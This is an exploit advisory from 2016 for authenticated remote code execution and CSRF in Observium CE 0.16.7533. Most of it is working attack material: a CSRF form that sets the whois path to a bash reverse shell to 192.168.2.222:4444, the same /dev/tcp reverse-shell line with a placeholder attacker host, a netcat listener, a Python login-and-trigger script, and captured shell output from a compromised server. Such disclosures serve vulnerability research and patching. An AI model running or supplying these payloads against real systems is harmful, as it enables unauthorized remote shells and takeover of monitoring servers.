Observium 0.16.7533 Code Execution / Cross Site Request Forgery
Posted on 30 April 2016
# Exploit title: Observium Commercial - Authenticated RCE # Author: Dolev Farhi # Contact: dolevf at protonmail.com # Date: 28-04-2016 # Vendor homepage: http://observium.org/ # Software version: CE 0.16.7533 Authenticated remote code execution Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener root@pt:~# nc -lvp 4444 listening on [any] 4444 ... and a CSRF which looks like this: <!-- <html> <div align="center"> <pre> <h2><b>CSRF<b></h2> <body> <form action="http://<observiumIP>/settings/section=paths/" method="POST"> <input type="hidden" name="temp_dir" value="" /> <input type="hidden" name="varset_temp_dir" value="" /> <input type="hidden" name="varset_rrdtool" value="" /> <input type="hidden" name="fping" value="" /> <input type="hidden" name="varset_fping" value="" /> <input type="hidden" name="fping6" value="" /> <input type="hidden" name="varset_fping6" value="" /> <input type="hidden" name="svn" value="" /> <input type="hidden" name="varset_svn" value="" /> <input type="hidden" name="snmpget" value="" /> <input type="hidden" name="varset_snmpget" value="" /> <input type="hidden" name="snmpwalk" value="" /> <input type="hidden" name="varset_snmpwalk" value="" /> <input type="hidden" name="snmpbulkget" value="" /> <input type="hidden" name="varset_snmpbulkget" value="" /> <input type="hidden" name="snmpbulkwalk" value="" /> <input type="hidden" name="varset_snmpbulkwalk" value="" /> <input type="hidden" name="snmptranslate" value="" /> <input type="hidden" name="varset_snmptranslate" value="" /> <input type="hidden" name="ipmitool" value="" /> <input type="hidden" name="varset_ipmitool" value="" /> <input type="hidden" name="virsh" value="" /> <input type="hidden" name="varset_virsh" value="" /> <input type="hidden" name="wmic" value="" /> <input type="hidden" name="varset_wmic" value="" /> <input type="hidden" name="git" value="" /> <input type="hidden" name="varset_git" value="" /> <input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" /> <input type="hidden" name="varset_whois" value="" /> <input type="hidden" name="whois_custom" value="1" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="varset_file" value="" /> <input type="hidden" name="dot" value="" /> <input type="hidden" name="varset_dot" value="" /> <input type="submit" name="submit" value="save" /> </form> </body> </div> </html> or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the whois parameter which gives us a reverse shell on the machine: you may also use the following python instead: """ import sys import urllib import urllib2 import cookielib #!/usr/bin/python username = 'test' password = '123456' timeout = 10 try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) opener.open('http://observium-server', login_data, timeout=timeout) url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' resp = opener.open(url) except Exception, e: print e sys.exit(1) """ listening on [any] 4444 ... 192.168.2.155: inverse host lookup failed: Unknown host connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 bash: no job control in this shell bash: /root/.bashrc: Permission denied bash-4.1$ ls -l /opt ls -l /opt total 48944 drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium -rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh